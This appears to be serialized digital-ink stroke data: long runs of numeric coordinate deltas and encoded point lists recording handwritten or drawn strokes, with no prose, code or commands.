0 0,0-2 0,0 1-1,12-8 1,-18 10-61,0-1 1,0 0-1,0-1 0,-1 1 1,0-1-1,1 0 0,-1 0 0,0 0 1,-1 0-1,1-1 0,-1 1 0,0-1 1,0 0-1,0 0 0,-1-1 1,1 1-1,-1 0 0,-1-1 0,1 1 1,-1-1-1,0 0 0,0 1 0,-1-1 1,1 0-1,-1 1 0,-1-1 1,1 0-1,-1 0 0,0 1 0,0-1 1,-1 1-1,1-1 0,-5-8 1,4 10 31,0 0 1,-1 1 0,1-1 0,-1 1 0,0 0 0,0 0-1,0 0 1,0 0 0,0 1 0,-1-1 0,1 1 0,-1 0-1,0 0 1,1 0 0,-1 1 0,0-1 0,0 1 0,0 0 0,0 0-1,-7-1 1,5 1-25,-1 0 0,1 1-1,-1 0 1,1 0 0,-1 0-1,1 1 1,-1 0 0,1 0-1,0 0 1,-1 1 0,1 0-1,-10 5 1,-3 3-26,15-8-54,0 0 0,0 0 0,0 1 0,0-1 0,0 1 0,1 0 0,-1 0 1,-3 5-1,-19 15-1837,12-12-1274,0 3-5617,5-8 5656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3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3 180,'0'0'106,"0"-1"-1,0 1 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0-1 1,0 1-1,0 0 1,-1 0 0,1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0 0,0-1-1,0 1 1,0 0-1,-1 0 1,1 0-1,0 0 1,0 0-1,0 0 1,0 0-1,-1 1 1,1-1 0,0 0-1,0 0 1,0 0-1,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0 0,-1 1-1,1-1 1,0 0-1,0 0 1,0 0-1,0 0 1,0 0-1,0 0 1,0 1-1,0-1 1,0 0 0,-1 0-1,1 1 1,-12 4 2663,-1 24 259,24 2 773,0-1-2901,-10-26-830,0 0 0,1 0 0,-1-1 0,1 1 1,0 0-1,0-1 0,1 1 0,3 4 0,8 15 314,-8-15-268,0-1 0,0 0 0,1-1 0,0 0 0,13 10 0,0 0 86,29 17 235,-42-30-394,0 1 0,-1 0 0,0 0-1,0 0 1,0 1 0,6 6-1,-1 0-13,2 0 0,-1-1 0,18 11 0,11 10-14,12 6-160,-36-27-1007,-16-10 668,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1 0,1-1 0,-1 1 0,0-1 0,0 0 0,0 1 0,-1-1 0,1 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-1 0 0,1 0 0,-1 0 0,2-1 0,-1-9-2992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28 509 564,'-11'7'4311,"9"1"-4953,-12-12 10709,20 6-6031,-7-4-3957,1 1 1,0 0 0,-1 0 0,1-1-1,0 1 1,0 0 0,0 0 0,0-1-1,0 1 1,1 0 0,-1 0-1,0-1 1,0 1 0,1 0 0,-1 0-1,1 0 1,-1 0 0,1-1 0,0 1-1,-1 0 1,1 0 0,0 0-1,1-1 1,1-5 76,-2 4-152,-1 0-1,1 0 1,-1 0-1,1 0 1,0 0-1,0 1 1,0-1-1,1 0 1,-1 0 0,1 1-1,-1-1 1,1 1-1,0-1 1,0 1-1,0 0 1,3-3-1,1-1 21,17-26 87,20-13 185,-36 36-280,1 0 1,0 0 0,1 1 0,0 0 0,0 0-1,17-10 1,60-36-27,65-43 91,-112 72-39,-30 17-22,1 2 0,1-1 0,-1 2 0,1-1 0,17-5 0,5-7-1,-9 7-18,-20 9 1,-1 1-1,0-1 1,1 0-1,-1 1 1,1 0 0,0 0-1,-1 0 1,1 0-1,4 1 1,100-13 47,161 1-149,-163 24 236,-86-10-58,0 1 1,0 0-1,0 2 1,-1 0-1,25 10 1,9 2-136,6-2 87,53 17 59,-95-25-61,14 4 134,39 21 1,-5 20-83,-63-50-73,0 0 0,0 0 0,0 0 0,0 1 0,0-1 0,0 0-1,-1 1 1,1-1 0,-1 1 0,0-1 0,1 1 0,-1 0 0,0 3-1,30 24 24,-28-26-13,0 0-1,1 0 1,0 0-1,0 0 1,0-1-1,6 5 1,12 11 140,-20-17-131,1 1 2,0-1 0,-1 1 0,1 0 1,0 1-1,-1-1 0,0 0 0,0 1 1,0 0-1,0-1 0,0 1 0,-1 0 1,0 0-1,0 0 0,0 0 0,1 7 0,-1-11-22,-1 1-1,1-1 1,-1 0-1,1 1 1,0-1-1,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 1-1,1-1 1,-1 1-1,1-1 1,-1 1-1,0-1 1,1 1-1,-1 0 0,0-1 1,1 1-1,-1 0 1,0-1-1,0 1 1,0 0-1,1 0 0,-1 1 4,0-2-3,-1 0-1,1 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 1,0-1-1,0 0 0,0 1 0,0-1 1,1 0-1,-1 1 0,0-1 1,0 0-1,0 1 0,0-1 0,0 0 1,0 0-1,1 1 0,-1-1 0,0 0 1,0 1-1,1-1 0,-1 0 1,0 0-1,0 1 0,1-1 0,-1 0 1,0 0-1,1 0 0,-1 0 1,0 1-1,0-1 0,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,0 0 1,1 0-1,-1 0 0,1 0 1,-1 0-1,0 0 0,1 0 0,-1 0 1,0 0-1,1 0 0,-1-1 0,0 0-210,0 1 139,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,-1 1-1,1 0 1,0-1-1,0 1 1,0-1-1,-1 1 1,1 0-1,0-1 1,-1 1-1,1 0 1,0-1-1,-1 1 1,1 0 0,0-1-1,-1 1 1,1 0-1,0 0 1,-1-1-1,1 1 1,-1 0-1,1 0 1,-1 0-1,1 0 1,0-1-1,-1 1 1,1 0-1,-1 0 1,1 0-1,-1 0 1,0 0-1,-22-8-6540,5-1-808,7 8 3549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1 283 936,'0'-1'278,"0"0"0,0 0 0,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,1 0 1,-1 0-1,0 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 1 0,0-1 0,-1 0 0,1 1 0,0-1 0,0 1 0,0 0 0,0-1 0,1 1 0,1-2 139,-1 0 401,-1 2-636,0-1-1,-1 0 0,1 1 1,0-1-1,0 0 1,0 1-1,0-1 0,0 1 1,-1-1-1,1 1 1,0 0-1,0-1 1,0 1-1,0 0 0,0-1 1,0 1-1,0 0 1,1 0-1,-1 0 0,0 0 1,0 0-1,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,0 1 1,1-1-1,34 8 1595,12 7-1255,-33-10-418,1 0 0,0 0 0,0-2 1,1 0-1,27 2 0,6-3 50,-31-1-68,0 0 0,33-4 0,21-3 44,-59 6 4,0 0 0,0-1 0,0-1 0,0 0 0,0-1 0,0-1 0,-1 0 0,1-1 0,13-6 0,-20 6-40,-1 0 1,1-1 0,-1 1-1,0-1 1,-1 0-1,0-1 1,0 1 0,0-1-1,0 0 1,-1 0 0,-1-1-1,1 1 1,-1-1-1,3-11 1,0-5 109,-5 21-193,0 1-1,0 0 1,0-1 0,-1 1-1,1 0 1,-1-1-1,1 1 1,-1-1-1,0 1 1,0-1 0,0 1-1,0-1 1,-1 1-1,1-1 1,-2-3 0,-4-22 32,5 24-47,1 1 0,-1-1 0,1 0 0,-1 0-1,0 0 1,-1 1 0,1-1 0,-1 0 0,1 1-1,-1-1 1,0 1 0,0 0 0,-5-5 0,7 8-24,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 0,0 0 1,-1-1-1,1 1 1,0 0-1,-1 0 1,1 0-1,0-1 1,-1 1-1,1 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 0-1,-1 0 1,1-1-1,0 1 0,-1 0 1,1 0-1,-1 1 1,1-1-1,0 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,0 0-1,-1 0 1,1 1-1,-1-1 1,1 0-1,0 0 1,-1 1-1,1-1 0,-1 1 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4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1875 0 4,'0'0'2246,"9"6"2859,-9-6-5014,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,-1 0 0,1 0-1,0 0 1,0-1 0,-1 1-1,1 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 1-1,0-1 1,-1 0 0,1 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 0-1,0 1 1,-1-1-1,1 0 1,0 0 0,0 0-1,0 0 1,-1 1 0,1-1-1,0 0 1,0 0 0,0 0-1,0 1 1,0-1 0,0 0-1,-1 0 1,1 1 0,0-1-1,0 0 1,0 0 0,0 1-1,0-1 1,0 0 0,0 1-3,0 0 1,0-1-1,0 1 0,0-1 1,0 1-1,0-1 1,-1 1-1,1-1 0,0 1 1,0-1-1,0 1 1,-1-1-1,1 1 1,0-1-1,-1 1 0,1-1 1,0 0-1,-1 1 1,1-1-1,-1 1 0,1-1 1,-1 0-1,1 0 1,0 1-1,-1-1 0,1 0 1,-2 1-1,-10 24 1556,10-21-1558,0-1-1,0 1 1,0-1-1,0 0 1,0 0-1,-1 0 1,0 0-1,1 0 1,-1 0-1,-5 3 1,-37 29 320,38-30-243,-1 0 1,1 0-1,0 1 1,-13 13-1,-6 6 69,-93 66 856,92-69-688,-2-2 0,-53 29 0,78-47-367,-18 13 187,18-12-127,-1 0-1,0 1 1,0-2 0,0 1 0,-11 4 0,0-3-51,0 2 1,1 0-1,-25 13 1,-44 30 572,68-39-563,10-6-43,-1 1 1,0-2-1,0 1 1,0-1 0,0 0-1,0 0 1,-1-1-1,-10 3 1,0 2 22,15-5-31,1-1-1,-1 0 1,0 1 0,1-1 0,-1 0-1,0-1 1,0 1 0,1 0 0,-1-1-1,-4 1 1,-58 22-26,45-16 64,12-4-13,0-1 0,0 0 0,0 0 0,-15 1 0,-72 16 531,93-19-503,-32-1 43,26-2-88,0 1 0,0 1 1,-1-1-1,1 2 0,0-1 0,0 1 0,-1 0 1,-12 2-1,-9 0 205,27-3-154,0 1-1,0-1 0,0 0 0,0 1 0,0-1 0,0-1 1,0 1-1,0 0 0,-3-3 0,3 3-26,-1-1-1,1 0 1,-1 0-1,1 1 1,-1 0-1,0 0 1,0 0-1,0 0 1,-5 0-1,-4-1-20,0-1-1,0-1 1,1 0-1,-14-7 1,25 11-12,1-1 0,0 1 0,-1-1 0,1 1 0,0-1 0,-1 1 1,1-1-1,-1 1 0,1 0 0,0-1 0,-1 1 0,1 0 0,-1 0 0,1-1 1,-1 1-1,1 0 0,-1 0 0,0-1 0,1 1 0,-1 0 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,1 0 0,-1 0 1,1 0-1,-1 1 0,1-1 0,-2 0 0,0-1 4,-7-5 0,1 0-1,-1 0 0,0 1 1,-1 0-1,1 1 0,-13-4 1,-62-12-117,82 20 86,2 0 31,0-1 1,0 1 0,-1 0 0,1-1 0,0 1 0,0-1 0,-1 1 0,1 0 0,0-1 0,-1 1-1,1 0 1,0-1 0,-1 1 0,1 0 0,-1 0 0,1-1 0,-1 1 0,1 0 0,0 0 0,-1 0-1,1 0 1,-1-1 0,1 1 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,-17-6 75,12 3-86,0 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1 1 0,0-1 0,1 1 0,-12-1 0,15 1 1,-6-3 7,-11-1-1,19 5-1,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0 0 0,0 0 0,0 0 0,0-1 0,1 1 0,-1 0 0,0-1 1,0 1-1,0 0 0,0-1 0,1 1 0,-1-1 0,0 0 0,0 1 0,1-1 0,-1 1 1,0-1-1,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1-1 0,-23-11 522,23 13-516,-1 0 0,0 0 0,0-1 1,1 1-1,-1 0 0,0 0 0,1-1 1,-1 1-1,1-1 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-1 0 0,1 0 1,-2-1-1,-8-6 208,5-1 146,6 8-359,1 1 1,-1 0 0,0 0-1,0 0 1,0-1 0,0 1 0,0 0-1,0 0 1,0 0 0,0-1-1,0 1 1,0 0 0,0 0-1,-1 0 1,1 0 0,0-1 0,0 1-1,0 0 1,0 0 0,0 0-1,0 0 1,0-1 0,0 1-1,0 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0-1-1,0 1 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,0 0-1,-1 0 1,1 0 0,0 0-1,0 0 1,0 0 0,-1 0 0,1 0-1,0 0 1,0 0 0,0 0-1,0 0 1,-1 0 0,1 0 0,0 0-1,0 0 1,0 0 0,-1 0-1,1 0 1,0 0 0,0 1-1,0-1 1,0 0 0,0 0 0,-1 0-1,1 0 1,0-10 100,-7 5-75,7 5-35,-1-1 1,1 1-1,0-1 1,0 1-1,-1 0 1,1-1-1,0 1 1,-1-1-1,1 1 1,0 0 0,-1-1-1,1 1 1,-1 0-1,1-1 1,-1 1-1,1 0 1,0 0-1,-1-1 1,1 1-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,1 0 1,-1 0-1,0 0 1,0 2-345,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,1 1 0,-1-1 0,-2 1 0,-37 24-9590,32-21 7775,-4 2-1658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5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2 378 568,'0'7'11576,"0"-8"-10713,0 1-795,0 0 0,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,1-1 0,-1 1 0,0 0 0,0-1 0,0 1 1,0 0-1,1 0 0,-1-1 0,0 1 0,0 0 0,1 0 0,-1 0 0,0-1 0,0 1 0,1 0 0,-1 0 0,0 0 0,0 0 0,1 0 1,-1-1-1,0 1 0,1 0 0,-1 0 0,0 0 0,1 0 0,1-1 641,-9-4-464,6 2-117,0-1 0,0 1 0,1 0 0,0-1 0,-1 1 0,1-1 0,0 1 0,2-6 0,-2-2 9,11-45-25,-1-5 486,-10-23 606,20 67-620,-7-14-92,-13 31-489,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0-1 1,0 1-1,0 0 1,1-1-1,-1 1 1,0-1-1,0 1 1,1-1-1,-1 1 1,0 0-1,0-1 1,1 1-1,-1 0 1,1-1-1,-1 1 1,0 0-1,1-1 1,5-10 393,-6 10-56,-2-28 1034,-4 27-847,15 10-200,0-6-300,-1 0 0,0 0 0,1 0 0,-1-1-1,1-1 1,0 0 0,-1 0 0,1 0-1,-1-1 1,17-3 0,25-1 15,-9 3 33,-1-2 1,56-12-1,-88 14-90,48 0-126,-55 2-31,1 0-1,-1 0 1,1 0 0,-1 0-1,1 0 1,-1 0-1,1 0 1,0 1 0,-1-1-1,0 1 1,1-1-1,-1 1 1,1-1 0,-1 1-1,1 0 1,-1 0-1,0-1 1,0 1 0,1 0-1,-1 0 1,0 0-1,0 0 1,0 1 0,0-1-1,0 0 1,0 0-1,-1 1 1,1-1 0,0 0-1,0 4 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1 516,'0'0'992,"-31"35"2399,21-5-2623,-3 3-191,-19 50 1184,28-78-1539,2 0 0,-1 1 1,0-1-1,1 1 0,0 0 1,0 0-1,0 6 0,-9 22 1132,10-28-1066,0 0-1,0 0 1,0 0-1,1 0 1,-1-1 0,2 1-1,0 11 1,0 4 382,0-18-611,-1 0 0,1 0-1,0 0 1,-1 0 0,1 0 0,1-1 0,-1 1 0,0 0-1,1-1 1,-1 1 0,1-1 0,0 1 0,0-1 0,0 0-1,0 0 1,0 0 0,0 0 0,1 0 0,-1 0 0,1 0-1,-1-1 1,1 0 0,-1 1 0,1-1 0,0 0 0,0 0-1,0 0 1,0-1 0,0 1 0,0-1 0,3 1 0,7 1 66,0-1 1,0 0-1,0 0 1,0-2-1,1 1 1,15-4 0,-3-1-725,52-3 1,-76 8-404,-24-7-9516,11 2 7709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44,'22'-19'6814,"-22"8"-6203,1 11-537,-1 0-1,0-1 1,0 1-1,0 0 0,0 0 1,0 0-1,0 0 1,0-1-1,0 1 0,0 0 1,0 0-1,0 0 1,0 0-1,0-1 0,0 1 1,0 0-1,0 0 1,0 0-1,0 0 0,0-1 1,0 1-1,0 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 1,0 0-1,0 0 0,0 0 1,0 0-1,-1 0 0,1-1 1,0 1-1,0 0 1,0 0-1,0 0 0,0 0 1,-1 0-1,1 0 1,0 0-1,0 0 0,0 0 1,0-1-1,0 1 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 1,0 0-1,-1 0 0,1 0 1,0 0-1,0 0 1,0 0-1,-1 0 0,1 0 1,0 1-1,0-1 1,0 0-1,-1 0 0,-5 0 498,8 37 2687,0-33-3173,-1 0-1,0 1 0,0-1 1,0 0-1,0 0 0,0 0 1,-1 1-1,0-1 1,0 6-1,-1-7-62,1 0 1,0 1-1,0-1 1,0 0-1,1 1 1,-1-1-1,1 0 1,0 0-1,0 1 0,0-1 1,0 0-1,0 0 1,3 3-1,7 37 203,-11-43-224,1 1 0,-1 0 1,1-1-1,-1 1 0,1 0 0,-1-1 1,0 1-1,1 0 0,-1 0 0,0-1 1,0 1-1,0 0 0,1 0 0,-1-1 1,0 1-1,0 0 0,0 0 0,0 0 1,0-1-1,0 1 0,-1 1 0,1-1-1,0-1 0,0 1 0,0-1-1,0 0 1,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 1 0,0-1-1,1 1 1,-1-1 0,0 0 0,0 1-1,1-1 1,-1 1 0,0-1 0,0 0-1,1 1 1,-1-1 0,1 0 0,-1 1-1,0-1 1,1 0 0,-1 1 0,1-1-1,-1 0 1,1 2 73,0 0 1,0 0-1,-1 0 0,1 1 0,-1-1 0,1 0 1,-1 0-1,0 0 0,0 1 0,0-1 0,0 0 1,-1 3-1,-3 15-2311,0-14-2338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10 200,'21'-9'14005,"-20"17"-9262,-1-7-4580,1-1-171,-1 0 1,1 0-1,-1 1 0,1-1 1,-1 0-1,1 1 0,-1-1 1,1 0-1,-1 1 1,1-1-1,-1 0 0,1 1 1,-1-1-1,0 1 0,1-1 1,-1 1-1,0-1 0,1 1 1,-1-1-1,0 1 0,0 0 1,0-1-1,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 1,0 0-1,0-1 0,0 1 1,1 14-3621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14 640,'-7'-13'9977,"14"32"-5314,3 18-2543,-10-10-1444,-1-17-517,0 0-1,1-1 1,1 1 0,0 0-1,0-1 1,0 1-1,6 16 1,-5-22-120,-1 1 1,0-1-1,0 1 0,-1-1 1,1 1-1,-1-1 0,0 8 1,0-7-17,-1-1 1,2 0-1,-1 1 1,0-1 0,1 1-1,0-1 1,2 7-1,8 26 75,-9-20-37,-3-16-101,1-1-1,0 1 0,0-1 0,-1 1 1,1-1-1,0 1 0,0-1 1,0 1-1,0-1 0,0 1 0,0-1 1,0 1-1,0-1 0,0 1 1,0 0-1,0-1 0,1 1 0,-1-1 1,0 1-1,0-1 0,0 1 1,1-1-1,-1 1 0,0-1 0,0 1 1,1-1-1,-1 0 0,1 1 1,-1-1-1,0 1 0,1-1 0,-1 0 1,1 1-1,-1-1 0,1 0 0,-1 0 1,1 1-1,-1-1 0,1 0 1,-1 0-1,1 0 0,-1 0 0,1 1 1,-1-1-1,1 0 0,-11-33-11501,10 17 8094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74 532,'7'-12'7158,"9"-13"-4077,-10 21-2673,-1 0-1,1 0 1,0 1 0,0-1 0,0 1-1,0 1 1,1-1 0,-1 1 0,1 0 0,0 0-1,-1 1 1,1 0 0,7 0 0,-5 1-534,0 1 1,0 1 0,0-1 0,0 1 0,0 1 0,-1-1-1,1 1 1,-1 1 0,0 0 0,0 0 0,0 1 0,0 0 0,9 7-1,-15-3-1386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26 888,'0'0'6156,"41"-18"-387,-35 16-5639,0 1 0,0-1 1,0 1-1,0 1 0,0-1 0,0 1 0,10 0 0,-10 0-79,82 7-470,-34-2-5526,-45 0 2608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54 1604,'-7'13'4309,"8"-13"-4225,-1 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,1 0 1,-1 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,1 0 0,-1 0 1,0 0-1,0 0 1,0 1-1,0-1 0,0 0 1,1 0-1,-1 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 0-1,0 1 0,1-1 1,-1 0-1,0 0 1,0 0-1,0 0 0,0 0 1,0 1-1,0-1 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 1,0 1-1,0-1 0,0 0 1,0 0-1,0 0 1,0 0-1,0 0 0,0 1 1,0-1-1,0 0 1,0 0-1,0 0 0,2 0 1386,41 0 2433,-27 0-3706,1-1-1,0-1 0,0 0 0,-1-1 1,1-1-1,28-11 0,0-5-3206,0-4-5194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2 964,'-9'-1'12594,"7"2"-12562,0 3 102,1-1 0,-1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,-1 0 0,0-1 0,0 1 0,1-1 0,-2 0 0,1 0 0,-4 3 0,-19 15 183,-7 11-177,26-25-160,0 0-1,1 0 1,0 0 0,0 1 0,-6 9 0,8-11-171,-1 0 0,1 0-1,-1-1 1,0 1 0,-1-1-1,1 0 1,-1-1 0,1 1-1,-1-1 1,-8 3 0,8-4-698,0 1 0,1-1 0,-1 0 0,0-1 0,0 0 0,-11 1 0,16-2 704,0 0 0,0 0 0,0-1 0,0 1 0,0-1 0,0 1-1,0-1 1,0 1 0,0-1 0,0 0 0,0 1 0,0-1 0,0 0 0,1 0-1,-1 0 1,0 0 0,1 0 0,-1 0 0,0 1 0,1-1 0,-1-1 0,1 1-1,-1 0 1,1 0 0,0 0 0,-1 0 0,1 0 0,0 0 0,0-2 0,0-8-1509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21 1392,'-1'-1'193,"1"0"0,0 1 0,0-1 1,0 1-1,0-1 0,0 0 0,0 1 0,0-1 0,0 1 0,0-1 0,0 0 1,0 1-1,0-1 0,0 1 0,0-1 0,0 0 0,1 1 0,-1-1 0,0 1 0,0-1 1,1 1-1,-1-1 0,0 1 0,1-1 0,-1 1 0,1-1 0,-1 1 0,0 0 1,1-1-1,-1 1 0,1-1 0,-1 1 0,1 0 0,0-1 0,1 0-84,-2 1 119,1 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,0 0 1,-1 0-1,1 0 0,-1 0 0,1 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1 0,1 0 0,-1 1 0,0-1 1,1 0-1,-1 1 0,1 0 0,16 18 2139,10 25-1071,5 10-774,-30-51-508,0 0-1,-1 0 1,1 0 0,0 0-1,0-1 1,0 1 0,1 0-1,3 3 1,16 20 63,-21-23-75,1 0 0,1-1-1,-1 1 1,0-1 0,1 0 0,-1 0-1,1 0 1,0 0 0,-1 0 0,1 0-1,6 2 1,20 16-324,-27-19 104,0 0 1,0 1-1,0-1 0,-1 0 0,1 0 0,1 0 0,-1 0 1,0-1-1,0 1 0,0-1 0,0 1 0,0-1 0,1 0 1,-1 0-1,4 0 0,22-6-9136,-19 1 6387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0 161 1724,'1'-1'385,"-1"-1"1,0 1-1,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,-1 0-1,1 0 0,0 0 1,0 0-1,0 0 0,0 0 1,0 0-1,0 0 0,0 1 0,0-1 1,0 0-1,0 1 0,0-1 1,0 1-1,1-1 0,0 1 1,44-15 2062,-4 1-1947,-24 5-463,-13 7-28,0 0 1,0 0-1,0-1 1,-1 0-1,1 0 1,-1 0-1,6-5 1,-9 6 28,1 1 0,-1-1 0,0 0 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,-1 0 0,1 0 0,-1 0 0,1 0 0,-1 0 0,0 0 1,0 0-1,0 0 0,0 0 0,0-1 0,0 1 0,-1 0 0,1 0 0,0 0 1,-1 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,-3-3 0,1 1 605,2 3-605,1 0 0,-1 1 1,1-1-1,-1 0 0,0 1 0,1-1 0,-1 0 0,0 1 0,0-1 0,0 1 0,1-1 1,-1 1-1,0-1 0,0 1 0,0 0 0,0-1 0,0 1 0,0 0 0,0 0 0,0 0 1,0 0-1,0 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,0 0 1,0 1-1,0-1 0,0 0 0,0 1 0,0-1 0,-1 1 0,-3 2 18,-1-1 0,0 1 0,1 0 0,0 1 0,0 0 0,0-1 0,0 1 0,1 1 1,-1-1-1,1 1 0,-4 5 0,-26 25 384,32-33-413,-1 0 0,1 0 1,-1 0-1,1 0 0,0 1 1,0-1-1,0 1 0,0-1 1,0 1-1,1 0 0,-1-1 1,1 1-1,-1 0 0,1 0 1,0 0-1,1 1 0,-1-1 1,0 0-1,1 0 0,-1 0 0,1 0 1,0 1-1,0-1 0,1 0 1,-1 0-1,1 0 0,-1 0 1,1 1-1,0-1 0,0 0 1,3 5-1,-1-3-34,0-1 0,0 1 0,1-1 0,0 0 0,-1 0 0,1 0 0,1-1 1,-1 0-1,1 1 0,-1-1 0,1-1 0,0 1 0,0-1 0,0 1 0,0-2 0,0 1 0,10 2 0,22 4-155,-24-5-286,1 0 0,-1-1 0,18 1 0,-9-2-1766,-20 0 1551,1-1 0,0 0 0,0 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0-1 0,0 0-1,-1 1 1,1-1 0,0 0 0,-1 0 0,4-2-1,5-3-2341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17 88,'-3'-11'7931,"-3"10"-7361,-2-1 1915,7 1-2394,1 1-1,-1 0 0,1 0 0,-1-1 1,0 1-1,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 1,0 0-1,1 0 0,-1 0 0,0 0 1,1 0-1,-1 0 0,0 0 1,1 0-1,-1 1 0,0-1 0,1 0 1,-1 0-1,1 1 0,-1-1 1,0 1-1,-14 3 773,12-4-789,1 1 1,0-1-1,0 0 1,0 1 0,0 0-1,0-1 1,0 1-1,1 0 1,-1 0-1,0 0 1,-2 2-1,-25 20 598,14-12-449,0 1-1,1 0 1,1 1 0,0 1 0,0 0 0,1 0 0,1 2-1,-14 24 1,24-38-214,1 0 0,-1 0 0,1 0 0,0 0-1,0 1 1,0-1 0,0 0 0,0 0 0,0 0-1,0 0 1,1 1 0,-1-1 0,1 0 0,0 0-1,-1 0 1,1 0 0,0 0 0,0 0 0,1 0-1,0 1 1,1 1-6,-1 0 1,1-1-1,0 1 0,0-1 0,1 1 0,-1-1 0,1-1 1,4 5-1,-2-5-71,0 1 0,1-1 1,-1 0-1,0 0 0,1-1 1,0 1-1,-1-2 0,1 1 1,0-1-1,-1 0 0,1 0 1,0-1-1,-1 1 0,8-3 1,42-13-3823,-1-5-4437,-34 10 5209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8 332,'-1'-6'14111,"3"4"-13601,6 8-1696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2 300,'0'-1'7594,"0"4"-7014,14 41 1404,-5-22-1328,-4-5-209,0 1-1,-2 0 0,0-1 0,1 27 0,7 48 903,0-26-853,-11 42-204,0-107-311,-2-13-7239,-5 5 4566,5-4-205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0 155 16,'0'-4'528,"1"1"1,-1-1-1,1 1 1,-1-1-1,1 1 1,0 0-1,1-1 0,-1 1 1,0 0-1,1 0 1,0 0-1,0 0 0,4-5 1,-1 2-10,0 0 0,1 1 1,-1 0-1,1 0 0,1 1 0,6-4 0,9-4 470,1 1-1,43-13 0,-62 22-856,7-1-41,0-1 0,0 2-1,0-1 1,0 2 0,1-1-1,-1 2 1,0-1 0,1 2-1,-1-1 1,1 2 0,-1-1-1,0 1 1,0 1 0,0 0-1,0 1 1,0 0 0,-1 1-1,0 0 1,19 12 0,-28-15-56,1 0-1,0 0 1,-1 0 0,1 0-1,-1 1 1,0-1 0,0 1 0,0-1-1,0 1 1,0-1 0,0 1 0,-1 0-1,1-1 1,-1 1 0,0 0-1,0-1 1,0 1 0,0 0 0,0-1-1,0 1 1,-1 0 0,0-1-1,-1 5 1,-6 12 296,-7 6-58,3-14-215,1 0 1,-2-1-1,1 0 1,-1-1 0,-1-1-1,0 0 1,-15 7 0,-13 7-98,23-11-73,-18 7-228,2-4-201,22-2-1552,7 5-4617,23-17 2411,-14 1 3463,10 4-1839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22 135 372,'11'-23'10617,"-2"11"-10523,-8 10 988,-5-14 1359,6 14-2072,-1 2-505,-10 18 858,7-16-719,1-2-3,1 0 0,0 0 0,-1 0-1,1 0 1,-1 0 0,1 0 0,0 0 0,-1 0 0,1 1 0,-1-1-1,1 0 1,0 0 0,-1 0 0,1 1 0,0-1 0,-1 0 0,1 0-1,0 1 1,0-1 0,-1 0 0,1 1 0,0-1 0,0 0-1,-1 1 1,1-1 0,0 0 0,0 1 0,0-1 0,0 1 0,-1-1-1,1 0 1,0 1 0,0-1 0,0 1 0,0-1 0,0 0 0,0 1-1,0-1 1,0 1 0,0-1 0,0 0 0,0 1 0,1 0-1,-3 4 23,-1 0-13,1-1 0,-1 1 0,1 0 0,0 0 0,0 0 0,0 0 1,1 1-1,-2 8 0,3-4-33,2 33-10,-1-42 33,-1 1 0,0 0 0,1 0 0,-1 0 0,1 0 0,0-1 0,0 1 0,-1 0 0,1-1 0,0 1 0,0 0 0,1-1 0,-1 1 1,0-1-1,0 0 0,1 1 0,-1-1 0,3 1 0,9 11-17,-12-11 17,-1-1-1,1 1 1,0-1-1,1 0 1,-1 0-1,0 0 1,0 1-1,0-1 1,1 0-1,-1 0 1,1-1-1,-1 1 1,0 0-1,4 1 1,15 6 2,-14-5 1,0 0 1,0-1-1,0 0 1,0 0 0,1 0-1,-1-1 1,0 0-1,1 0 1,-1 0 0,1-1-1,12-1 1,-13 1-2,0-1 0,1 0 0,-1-1-1,0 1 1,0-1 0,0 0 0,0-1 0,-1 1 